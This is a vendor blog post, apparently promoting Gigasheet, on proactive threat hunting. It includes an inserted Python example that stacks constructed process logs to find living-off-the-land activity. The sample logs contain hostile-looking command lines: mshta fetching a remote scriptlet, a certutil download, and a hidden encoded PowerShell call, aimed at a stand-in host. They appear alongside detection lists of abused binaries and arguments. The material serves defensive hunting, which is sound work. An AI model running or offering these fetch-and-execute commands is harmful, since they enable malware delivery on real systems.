As threat actors continue to escalate their cyber-attacks in technique complexity, creativity, and execution, victim organizations are fighting back harder than ever, as attested by the latest global dwell time reported in Mandiant's 2021 M-Trends Report. In 2020, the global median dwell time, or the number of days a threat actor remains within a victim environment before being detected, was only twenty-four (24) days, roughly ninety-four percent (94%) lower than ten years earlier (median dwell time in 2011 was 416 days, more than seventeen times longer). While these numbers are encouraging for the ongoing cyber-fight and a testament to organizations' commitment to information security, more sophisticated attacks that rely on commonly approved tools already present in the environment may bypass automated detective controls and remain hidden for long periods in the noise of the network. Consequently, some organizations are maturing their security operations and incident response capabilities by adopting proactive threat hunting to help uncover threats that would otherwise bypass automated detective and preventive technical controls or remain unseen by the naked eye.
This blog will introduce threat hunting as the next step in SOC and incident response maturity, focusing on the people, processes, and technology elements that underpin this advanced capability.
Threat hunting is the practice of proactively analyzing system and network events against hypotheses, informed by curated threat intelligence, to uncover active threats hidden within an environment. Although threat hunting is a desirable internal capability for well-resourced and mature information security programs, it may be the wrong investment for under-staffed organizations or information security teams with immature security operations and incident response programs. The idiom "walk before you run" remains true: you should master threat detection (e.g., alerting, triaging, and response) before graduating to threat hunting.
Threat hunting augments threat detection and response with an analytical process that starts from a threat hypothesis, which research and data then prove or disprove. When a hypothesis is proven, the outcome can be twofold:
In either case, threat hunting is a proactive approach that requires humans to look for intrusion indicators beyond the conclusive, rule-based signals that automated tools act on, before any security tool generates an alert.
Unlike threat detection, which relies heavily on technology and process, threat hunting is knowledge, skills, and competency-driven; technology and process are auxiliary. A successful threat hunter will have advanced knowledge of threats, attack methods, tactics, incident response, security monitoring, and systems. Furthermore, threat hunters will possess a deep understanding of the environment in which threat hunting is conducted and an inquisitive, intellectually curious, and creative mind focused on defeating threat actors on the other side.
The "people" element is the pillar of threat hunting, while processes and tools assume a secondary role.
The purpose of threat hunting is to look for evidence of active threats hidden in an IT environment. Although several threat hunting methodologies have become available in recent years, there are no one-size-fits-all rules or step-by-step guides that one can follow to prove or disprove a threat scenario or hypothesis. Attempting to force a rigid process or structure onto threat hunting will keep hunters from thinking outside the box, expanding their hunting scope, pivoting to other hypotheses, and ultimately outsmarting the attackers. In general, a common threat hunting process may include the following steps:
Threat hunters should be given a blank canvas to start from and a high-level framework to get inspiration from and keep from getting lost, such as the MITRE ATT&CK framework or the Cyber Kill Chain.
Threat hunting would not be needed if technology or tools were enough to detect security threats. While some aspects of threat hunting can be automated, such as data collection, it is impossible to fully automate threat hunting, as it requires human analysis, creative thinking, and intuition. Several tools can aid in threat hunting, including endpoint and network detection and response tools, threat intelligence platforms, and Security Information and Event Management (SIEM) systems, but these are secondary to human analysis.
Additionally, threat hunters should consider adding a data analysis platform to their tool arsenal to help annotate, group, aggregate, transform, and share different data sets with other threat hunters to identify patterns and indicators of attacks. Tools like Gigasheet, designed with an intuitive user interface, allow threat hunters to start analyzing data quickly without the steep learning curve other tools or programming languages require. Doing so enables threat hunters to focus on what they are good at (hunting threats) rather than writing scripts and programs to aggregate, collate, and analyze data.
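To make the hypothesis-driven loop above concrete, here is an added example that is not part of the original post and not code from Gigasheet or any other product named here. It assumes a hypothesis drawn from the "commonly approved tools" concern earlier in the post: an intruder is proxying execution through signed Windows binaries (MITRE ATT&CK T1218, and PowerShell under T1059.001), so no rule fires. The script stacks constructed process-creation events by (parent, child) pair across hosts, then scores the long tail of that stack against the hypothesis. The `host|parent|image|cmdline` record format, the sample events, the LOLBIN and user-application lists, and the scoring weights are all assumptions made for this example.

```python
"""Hypothesis-driven hunt over process-creation telemetry (added example; constructed data)."""
from collections import defaultdict
from dataclasses import dataclass

# Hypothesis (assumed for this example): an intruder is proxying execution through
# signed, commonly approved Windows binaries, so rule-based alerting stays quiet.
# The tags refer to MITRE ATT&CK T1218 (System Binary Proxy Execution) and
# T1059.001 (PowerShell); the lists and weights below are this example's own choices.
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "certutil.exe",
           "powershell.exe", "wscript.exe", "cscript.exe"}
USER_APPS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe"}  # rarely legitimate parents
SUSPICIOUS_ARGS = ("-enc", "-encodedcommand", "urlcache", "http://", "https://", "javascript:")

# Constructed process-creation events (not real telemetry), one per line:
# host|parent image|image|command line. The last line simulates a broken collector.
SAMPLE_LOG = r"""
ws-01|explorer.exe|powershell.exe|powershell.exe -NoProfile -File C:\scripts\inventory.ps1
ws-02|explorer.exe|powershell.exe|powershell.exe -NoProfile -File C:\scripts\inventory.ps1
ws-03|explorer.exe|powershell.exe|powershell.exe -NoProfile -File C:\scripts\inventory.ps1
ws-01|svchost.exe|rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
ws-02|svchost.exe|rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
ws-03|svchost.exe|rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
ws-04|svchost.exe|rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
ws-05|explorer.exe|wscript.exe|wscript.exe C:\logon\map_drives.vbs
ws-07|winword.exe|mshta.exe|mshta.exe javascript:a=GetObject("script:https://cdn.example.net/u.sct").Exec()
ws-07|cmd.exe|certutil.exe|certutil.exe -urlcache -split -f https://cdn.example.net/s.dat C:\Users\Public\s.dat
ws-12|excel.exe|powershell.exe|powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA
malformed line from a broken collector
"""


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent: str
    image: str
    cmdline: str


@dataclass
class Lead:
    parent: str
    image: str
    hosts: list
    score: int
    reasons: list
    samples: list


def parse_events(text):
    """Parse 'host|parent|image|cmdline' lines. Returns (events, skipped_line_count)."""
    events, skipped = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue                      # blank separators are not telemetry
        parts = line.strip().split("|", 3)
        if len(parts) != 4 or not all(parts[:3]):
            skipped += 1                  # malformed records are counted, never silently lost
            continue
        host, parent, image, cmdline = parts
        events.append(ProcEvent(host, parent.lower(), image.lower(), cmdline))
    return events, skipped


def stack(events):
    """Frequency-stack (parent, image) pairs: which hosts show each pair, plus sample command lines."""
    hosts, samples = defaultdict(set), defaultdict(list)
    for e in events:
        key = (e.parent, e.image)
        hosts[key].add(e.host)
        if len(samples[key]) < 3:
            samples[key].append(e.cmdline)
    return hosts, samples


def hunt(events, rare_hosts=1):
    """Score each LOLBIN pair against the hypothesis; return leads, highest score first."""
    hosts, samples = stack(events)
    leads = []
    for (parent, image), seen_on in hosts.items():
        if image not in LOLBINS:
            continue
        reasons, score = [], 0
        if len(seen_on) <= rare_hosts:    # prevalence: the long tail of the stack
            reasons.append(f"rare: seen on {len(seen_on)} host(s)")
            score += 1
        if parent in USER_APPS:           # an Office or browser process spawning a LOLBIN
            reasons.append(f"user application {parent} spawned {image}")
            score += 2
        args = [a for a in SUSPICIOUS_ARGS
                if any(a in c.lower() for c in samples[(parent, image)])]
        if args:                          # arguments that change what a benign binary does
            reasons.append("command line contains " + ", ".join(args))
            score += 2
        if score:
            leads.append(Lead(parent, image, sorted(seen_on), score, reasons,
                              samples[(parent, image)]))
    return sorted(leads, key=lambda l: (-l.score, l.parent, l.image))


if __name__ == "__main__":
    events, skipped = parse_events(SAMPLE_LOG)
    print(f"{len(events)} events parsed, {skipped} malformed line(s) skipped")
    for lead in hunt(events):
        print(f"[{lead.score}] {lead.parent} -> {lead.image} on {', '.join(lead.hosts)}")
        for reason in lead.reasons:
            print("    -", reason)
```

Run as-is, the fleet-wide pairs (`explorer.exe -> powershell.exe`, `svchost.exe -> rundll32.exe`) drop out of the result entirely, while the single-host Office-to-mshta and Excel-to-PowerShell pairs surface at the top for the hunter to pivot on. Two caveats a practitioner would want: stacking is only as good as its baseline, so `rare_hosts` has to be chosen against a fleet-wide window of days or weeks rather than a handful of events; and a high score is a lead to investigate, not a verdict, which is exactly where the human analysis the post describes takes over.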
Suppose your organization has mastered threat detection and response, your automated, rule-based alerting tools are no longer yielding high-value detections, and you remain concerned about advanced, stealthy threats. In that case, you can step up your SOC and incident response game by developing and implementing a threat hunting capability designed to proactively look for signs of intrusions and hidden threats that would otherwise be missed. And if you need a data analysis platform to help your team along the way, try Gigasheet (it's free), the next-generation threat hunting platform.